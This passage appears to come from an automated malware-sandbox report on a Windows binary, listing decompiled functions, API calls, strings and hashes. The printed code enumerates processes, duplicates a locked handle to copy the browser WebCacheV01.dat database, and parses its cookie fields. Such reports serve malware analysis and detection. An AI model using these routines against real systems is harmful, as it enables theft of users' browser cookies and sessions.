Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
EnumResourceTypesW.KERNEL32 ref: 0040BEE6

Strings

/savelangfile, xrefs: 0040BF32
/deleteregkey, xrefs: 0040BF60
, xrefs: 0040BEFA

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D071, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D071(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryW(L"psapi.dll"); // executed
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[4] = _t14;
					return _t14;
				}
				return _t7;
			}

0x0040d074
0x0040d07c
0x0040d08e
0x0040d099
0x0040d0a5
0x0040d0b1
0x0040d0bd
0x0040d0c9
0x0040d0cc
0x0040d0ce
0x00000000
0x0040d0d1
0x0040d0d2

APIs

LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,751459F0,0040CF75,?,?), ref: 0040D07C
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC

Strings

EnumProcesses, xrefs: 0040D0B6
psapi.dll, xrefs: 0040D077
EnumProcessModulesEx, xrefs: 0040D09E
GetModuleBaseNameW, xrefs: 0040D088
GetModuleFileNameExW, xrefs: 0040D0AA
EnumProcessModules, xrefs: 0040D092
GetModuleInformation, xrefs: 0040D0C2

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2238633743-4233621989
Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88

Uniqueness

Uniqueness Score: -1.00%

Function 00403BAF, Relevance: 19.7, APIs: 4, Strings: 9, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				int _v60;
				int _v64;
				int _v68;
				char _v72;
				intOrPtr _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				void _v124;
				void _v132;
				void _v136;
				char _v140;
				char _v912;
				char _v936;
				char _v1496;
				char _v1500;
				void* __edi;
				void* __esi;
				void* _t89;
				signed int _t109;
				signed int _t114;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr* _t137;
				intOrPtr* _t139;
				void* _t142;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t151;
				void* _t163;

				_t151 = __edx;
				_v76 = 0x100;
				_v56 = 0x100;
				_v80 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				E00403E49( &_v1500);
				_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
				_t164 = _t89;
				if(_t89 == 0) {
					L30:
					E00403E8F( &_v912);
					E00403F55( &_v936);
					E00406710( &_v1496);
					E00406355( &_v72);
					return E00406355( &_v92);
				} else {
					_v12 = 0x20;
					_v20 = 0;
					_v8 = 0;
					_v16 = 0;
					do {
						if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
							_t161 =  &_v20;
							_v24 = E004039C1( &_v20, L"Name");
							_v28 = E004039C1( &_v20, L"Value");
							_v32 = E004039C1( &_v20, L"Path");
							_v36 = E004039C1( &_v20, L"RDomain");
							_v48 = E004039C1(_t161, L"Expires");
							_v52 = E004039C1(_t161, L"LastModified");
							_v44 = E004039C1(_t161, L"EntryId");
							_v40 = E004039C1(_t161, L"Flags");
							if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
								_t109 = memset( &_v136, 0, 0x2c);
								_t163 = _t163 + 0xc;
								E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
								E0040518A( &_v92, _v36);
								_t114 = _v92;
								_v112 = 0x40f454;
								if(_t114 != 0) {
									_v112 = _t114;
								}
								E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
								E0040518A( &_v72, _v32);
								_t119 = _v72;
								_v116 = 0x40f454;
								if(_t119 != 0) {
									_v116 = _t119;
								}
								_t120 = _v24;
								_t147 =  *((intOrPtr*)(_t120 + 0x328));
								if(_t147 <= 0) {
									_v108 = 0x40f924;
								} else {
									_t139 = _t120 + 0x220;
									 *((char*)(_t147 +  *_t139 - 1)) = 0;
									_v108 =  *_t139;
								}
								_t121 = _v28;
								_t148 =  *((intOrPtr*)(_t121 + 0x328));
								if(_t148 <= 0) {
									_v104 = 0x40f924;
								} else {
									_t137 = _t121 + 0x220;
									 *((char*)( *_t137 + _t148 - 1)) = 0;
									_v104 =  *_t137;
								}
								_t122 = _v48;
								if(_t122 != 0) {
									memcpy( &_v132, _t122 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t123 = _v52;
								if(_t123 != 0) {
									memcpy( &_v124, _t123 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t124 = _v40;
								if(_t124 != 0) {
									_v96 =  *((intOrPtr*)(_t124 + 0x220));
								}
								_t125 = _v44;
								if(_t125 == 0) {
									_v140 = 0;
									_v136 = 0;
								} else {
									_v140 =  *((intOrPtr*)(_t125 + 0x220));
									_v136 =  *((intOrPtr*)(_t125 + 0x224));
								}
								_v100 = _a8;
								 *((intOrPtr*)( *_a4))( &_v140); // executed
							}
						}
					} while (E0040489D( &_v1500) != 0);
					if(_v20 != 0) {
						free(_v20);
					}
					goto L30;
				}
			}

0x00403baf
0x00403bc1
0x00403bc4
0x00403bce
0x00403bd1
0x00403bd4
0x00403bd7
0x00403bda
0x00403bdd
0x00403be0
0x00403be3
0x00403be6
0x00403bfc
0x00403c01
0x00403c03
0x00403e11
0x00403e17
0x00403e22
0x00403e2d
0x00403e35
0x00403e46
0x00403c09
0x00403c09
0x00403c10
0x00403c13
0x00403c16
0x00403c19
0x00403c2b
0x00403c36
0x00403c43
0x00403c50
0x00403c5d
0x00403c6a
0x00403c77
0x00403c84
0x00403c91
0x00403c9c
0x00403c9f
0x00403cca
0x00403ccf
0x00403cde
0x00403ce8
0x00403ced
0x00403cf2
0x00403cf5
0x00403cf7
0x00403cf7
0x00403d01
0x00403d0b
0x00403d10
0x00403d15
0x00403d18
0x00403d1a
0x00403d1a
0x00403d1d
0x00403d20
0x00403d28
0x00403d3c
0x00403d2a
0x00403d2a
0x00403d31
0x00403d37
0x00403d37
0x00403d43
0x00403d46
0x00403d4e
0x00403d62
0x00403d50
0x00403d50
0x00403d57
0x00403d5d
0x00403d5d
0x00403d69
0x00403d6e
0x00403d7c
0x00403d81
0x00403d81
0x00403d84
0x00403d89
0x00403d97
0x00403d9c
0x00403d9c
0x00403d9f
0x00403da4
0x00403dac
0x00403dac
0x00403daf
0x00403db4
0x00403dd0
0x00403dd6
0x00403db6
0x00403dc2
0x00403dc8
0x00403dc8
0x00403de8
0x00403dee
0x00403dee
0x00403c9f
0x00403dfb
0x00403e06
0x00403e0b
0x00403e10
0x00000000
0x00403e06

APIs

Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F

Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0

free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B

Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA

memset.MSVCRT ref: 00403CCA

Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC

memcpy.MSVCRT ref: 00403D7C
memcpy.MSVCRT ref: 00403D97

Strings

Expires, xrefs: 00403C65
, xrefs: 00403C09
EntryId, xrefs: 00403C7F
LastModified, xrefs: 00403C72
Name, xrefs: 00403C31
Value, xrefs: 00403C3E
RDomain, xrefs: 00403C58
Flags, xrefs: 00403C8C
Path, xrefs: 00403C4B

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$_wcsicmpmemset$freewcslen
String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
API String ID: 4182952938-1692241855
Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58

Uniqueness

Uniqueness Score: -1.00%

Function 004039F6, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004039F6(void* __eax) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v52;
				void _v578;
				int _v580;
				void _v1106;
				long _v1108;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				signed short _t48;
				int _t55;
				void* _t60;
				signed int _t63;
				void* _t77;
				void* _t94;
				signed short* _t100;
				void* _t102;

				_t102 = __eax;
				_t44 =  *((intOrPtr*)(__eax + 0x63c));
				_t100 = __eax + 0x430;
				_v8 = 0;
				 *_t100 = 0;
				if(_t44 != 1) {
					__eflags = _t44 - 2;
					if(__eflags == 0) {
						_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
						__eflags = _t48;
						if(_t48 == 0) {
							_v8 =  *((intOrPtr*)(_t102 + 0x418));
						}
					}
					L15:
					return _v8;
				}
				_v580 = 0;
				memset( &_v578, 0, 0x208);
				_v1108 = _v1108 & 0x00000000;
				memset( &_v1106, 0, 0x208);
				E0040DACC( &_v1108, 0); // executed
				_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				_t12 = wcslen( &_v1108) + 1; // 0x1
				if(_t55 + _t12 >= 0x104) {
					_t15 =  &_v580;
					 *_t15 = _v580 & 0x00000000;
					__eflags =  *_t15;
				} else {
					E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				}
				_t60 = E004057D1( &_v580);
				_t109 = _t60;
				_pop(_t94);
				if(_t60 == 0) {
					_v8 = 0xfffffffd;
				} else {
					_t90 = _t102 + 4;
					_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
					_t110 = _t63;
					if(_t63 == 0) {
						_v20 = _v20 & _t63;
						_v16 = _v16 & _t63;
						_v12 = 0x1388;
						E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
						E00406264( &_v52, _t94, L"taskhost.exe");
						E00406264( &_v52, _t94, L"taskhostex.exe");
						E00406264( &_v52, _t94, L"taskhostw.exe");
						E0040567E(_t100, L"ecv"); // executed
						_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
						_t111 = _t77;
						_push(_t100);
						if(_t77 == 0) {
							_v8 = 0xfffffffe;
							DeleteFileW(??);
							 *_t100 =  *_t100 & 0x00000000;
							__eflags =  *_t100;
						} else {
							if(E00403FDE(_t90, _t111) == 0) {
								_v8 =  *((intOrPtr*)(_t102 + 0x418));
							}
						}
						E0040623E( &_v52);
						E00406710( &_v20);
					}
				}
			}

0x00403a01
0x00403a03
0x00403a0f
0x00403a15
0x00403a18
0x00403a1b
0x00403b86
0x00403b89
0x00403b95
0x00403b9a
0x00403b9c
0x00403ba4
0x00403ba4
0x00403b9c
0x00403ba7
0x00403bae
0x00403bae
0x00403a2f
0x00403a36
0x00403a3b
0x00403a50
0x00403a5e
0x00403a68
0x00403a7c
0x00403a86
0x00403aa3
0x00403aa3
0x00403aa3
0x00403a88
0x00403a9a
0x00403aa0
0x00403ab2
0x00403ab7
0x00403ab9
0x00403aba
0x00403b7d
0x00403ac0
0x00403ac6
0x00403acc
0x00403ad1
0x00403ad3
0x00403ad9
0x00403adc
0x00403ae2
0x00403af3
0x00403b00
0x00403b0d
0x00403b1a
0x00403b24
0x00403b3a
0x00403b3f
0x00403b41
0x00403b42
0x00403b5a
0x00403b61
0x00403b67
0x00403b67
0x00403b44
0x00403b4d
0x00403b55
0x00403b55
0x00403b4d
0x00403b6e
0x00403b76
0x00403b76
0x00403ad3

APIs

memset.MSVCRT ref: 00403A36
memset.MSVCRT ref: 00403A50

Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF

wcslen.MSVCRT ref: 00403A68
wcslen.MSVCRT ref: 00403A77

Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947

DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61

Strings

taskhostw.exe, xrefs: 00403B12
ecv, xrefs: 00403B1F
dllhost.exe, xrefs: 00403AEE
taskhostex.exe, xrefs: 00403B05
Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00403A63, 00403A8E
taskhost.exe, xrefs: 00403AF8

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
API String ID: 2175868439-3212516833
Opcode ID: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
Opcode Fuzzy Hash: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0A4, Relevance: 18.1, APIs: 12, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 32%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t47;
				signed int _t49;
				signed int _t51;
				int _t53;
				int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				int _t61;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t67;
				signed int _t71;
				int _t72;
				void* _t73;
				intOrPtr _t81;

				_t67 = __edx;
				_push(0x70);
				_push(0x40f3f0);
				E0040E2B8(__ebx, __edi, __esi);
				_t35 = GetModuleHandleA(0);
				if(_t35->i != 0x5a4d) {
					L4:
					 *(_t73 - 0x1c) = 0;
				} else {
					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
					if( *_t66 != 0x4550) {
						goto L4;
					} else {
						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
						if(_t57 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t58 = 0;
								__eflags =  *(_t66 + 0xe8);
								goto L9;
							}
						} else {
							if(_t57 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t58 = 0;
									__eflags =  *(_t66 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t73 - 4) = 0;
				_t61 = 2;
				__set_app_type(_t61);
				 *0x413700 =  *0x413700 | 0xffffffff;
				 *0x413704 =  *0x413704 | 0xffffffff;
				_t37 = __p__fmode();
				_t63 =  *0x41238c; // 0x0
				 *_t37 = _t63;
				_t38 = __p__commode();
				_t64 =  *0x412388; // 0x0
				 *_t38 = _t64;
				 *0x4136fc =  *_adjust_fdiv;
				_t41 = E0040E2B2();
				_t81 =  *0x412000; // 0x1
				if(_t81 == 0) {
					__setusermatherr(E0040E2B2);
					_pop(_t64);
				}
				E0040E2A0(_t41);
				L0040E29A();
				_t43 =  *0x412384; // 0x0
				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
				_t47 = _t73 - 0x2c;
				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
				_push(0x40f3bc);
				_push(0x40f394); // executed
				L0040E29A(); // executed
				_t71 =  *__imp___wcmdln;
				if(_t71 != 0) {
					 *(_t73 - 0x34) = _t71;
					__eflags =  *_t71 - 0x22;
					if( *_t71 != 0x22) {
						while(1) {
							__eflags =  *_t71 - 0x20;
							if( *_t71 <= 0x20) {
								goto L19;
							}
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
						}
					} else {
						while(1) {
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
							_t56 =  *_t71;
							__eflags = _t56;
							if(_t56 == 0) {
								break;
							}
							__eflags = _t56 - 0x22;
							if(_t56 != 0x22) {
								continue;
							}
							break;
						}
						__eflags =  *_t71 - 0x22;
						if( *_t71 == 0x22) {
							L18:
							_t71 = _t71 + _t61;
							__eflags = _t71;
							 *(_t73 - 0x34) = _t71;
						}
					}
					L19:
					_t49 =  *_t71;
					__eflags = _t49;
					if(_t49 != 0) {
						__eflags = _t49 - 0x20;
						if(_t49 <= 0x20) {
							goto L18;
						}
					}
					 *(_t73 - 0x4c) = 0;
					GetStartupInfoW(_t73 - 0x78);
					__eflags =  *(_t73 - 0x4c) & 0x00000001;
					if(__eflags == 0) {
						_t51 = 0xa;
					} else {
						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
					}
					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
					_t72 = _t53;
					 *(_t73 - 0x7c) = _t72;
					__eflags =  *(_t73 - 0x1c);
					if( *(_t73 - 0x1c) == 0) {
						exit(_t72); // executed
					}
					__imp___cexit();
					_t32 = _t73 - 4;
					 *_t32 =  *(_t73 - 4) | 0xffffffff;
					__eflags =  *_t32;
					_t54 = _t72;
				} else {
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					_t54 = 0xff;
				}
				return E0040E2F1(_t54);
			}

0x0040e0a4
0x0040e0a4
0x0040e0a6
0x0040e0ab
0x0040e0b3
0x0040e0be
0x0040e0df
0x0040e0df
0x0040e0c0
0x0040e0c3
0x0040e0cb
0x00000000
0x0040e0cd
0x0040e0cd
0x0040e0d6
0x0040e0f7
0x0040e0fb
0x00000000
0x0040e0fd
0x0040e0fd
0x0040e0ff
0x00000000
0x0040e0ff
0x0040e0d8
0x0040e0dd
0x0040e0e4
0x0040e0eb
0x00000000
0x0040e0ed
0x0040e0ed
0x0040e0ef
0x0040e105
0x0040e105
0x0040e105
0x0040e108
0x0040e108
0x00000000
0x00000000
0x00000000
0x0040e0dd
0x0040e0d6
0x0040e0cb
0x0040e10b
0x0040e110
0x0040e112
0x0040e119
0x0040e120
0x0040e127
0x0040e12d
0x0040e133
0x0040e135
0x0040e13b
0x0040e141
0x0040e14a
0x0040e14f
0x0040e154
0x0040e15a
0x0040e161
0x0040e167
0x0040e167
0x0040e168
0x0040e177
0x0040e17c
0x0040e181
0x0040e196
0x0040e19a
0x0040e1a0
0x0040e1a3
0x0040e1a8
0x0040e1ad
0x0040e1ba
0x0040e1be
0x0040e1ce
0x0040e1d1
0x0040e1d5
0x0040e21c
0x0040e21c
0x0040e220
0x00000000
0x00000000
0x0040e222
0x0040e224
0x0040e224
0x0040e1d7
0x0040e1d7
0x0040e1d7
0x0040e1d9
0x0040e1dc
0x0040e1df
0x0040e1e2
0x00000000
0x00000000
0x0040e1e4
0x0040e1e8
0x00000000
0x00000000
0x00000000
0x0040e1e8
0x0040e1ea
0x0040e1ee
0x0040e1f0
0x0040e1f0
0x0040e1f0
0x0040e1f2
0x0040e1f2
0x0040e1ee
0x0040e1f5
0x0040e1f5
0x0040e1f8
0x0040e1fb
0x0040e1fd
0x0040e201
0x00000000
0x00000000
0x0040e201
0x0040e203
0x0040e20a
0x0040e210
0x0040e214
0x0040e22b
0x0040e216
0x0040e216
0x0040e216
0x0040e237
0x0040e23c
0x0040e23e
0x0040e241
0x0040e244
0x0040e247
0x0040e247
0x0040e24d
0x0040e282
0x0040e282
0x0040e282
0x0040e286
0x0040e1c0
0x0040e1c0
0x0040e1c4
0x0040e1c4
0x0040e28d

APIs

GetModuleHandleA.KERNEL32(00000000,0040F3F0,00000070), ref: 0040E0B3
__set_app_type.MSVCRT ref: 0040E112
__p__fmode.MSVCRT ref: 0040E127
__p__commode.MSVCRT ref: 0040E135
__setusermatherr.MSVCRT ref: 0040E161
_initterm.MSVCRT ref: 0040E177
__wgetmainargs.KERNELBASE ref: 0040E19A
_initterm.MSVCRT ref: 0040E1AD
GetStartupInfoW.KERNEL32(?), ref: 0040E20A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040E230
exit.KERNELBASE ref: 0040E247
_cexit.MSVCRT ref: 0040E24D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5E9, Relevance: 18.1, APIs: 12, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				struct _OVERLAPPED* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t52;
				int _t55;
				int _t57;
				void* _t67;

				_t57 = 0;
				_v8 = 0;
				_v12 = 0;
				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
				if(_t38 != 0) {
					_v24 = 0;
					_v20 = 0;
					_v16 = 0x1388;
					E00406729(0x8000,  &_v24);
					_t41 = OpenProcess(0x40, 0, _v8);
					_v8 = _t41;
					if(_t41 != 0) {
						_a12 = 0;
						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
						if(_a12 != 0) {
							_a8 = GetFileSize(_a12, 0);
							_a4 = E00405351(_a16);
							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
							_v12 = _t49;
							if(_t49 != 0) {
								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
								_t67 = _t52;
								if(_t67 != 0) {
									_a16 = 0;
									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
									_t57 = _t55;
									UnmapViewOfFile(_t67);
								}
								FindCloseChangeNotification(_v12); // executed
							}
							CloseHandle(_a4);
							CloseHandle(_a12);
						}
						CloseHandle(_v8);
					}
					E00406710( &_v24);
				}
				return _t57;
			}

0x0040c601
0x0040c603
0x0040c606
0x0040c609
0x0040c610
0x0040c620
0x0040c623
0x0040c626
0x0040c62d
0x0040c638
0x0040c640
0x0040c643
0x0040c654
0x0040c664
0x0040c673
0x0040c682
0x0040c694
0x0040c697
0x0040c69f
0x0040c6a2
0x0040c6ac
0x0040c6b2
0x0040c6b6
0x0040c6c0
0x0040c6c7
0x0040c6ce
0x0040c6d0
0x0040c6d0
0x0040c6d9
0x0040c6d9
0x0040c6de
0x0040c6e3
0x0040c6e3
0x0040c6e8
0x0040c6e8
0x0040c6ed
0x0040c6f3
0x0040c6f8

APIs

Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816

Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E

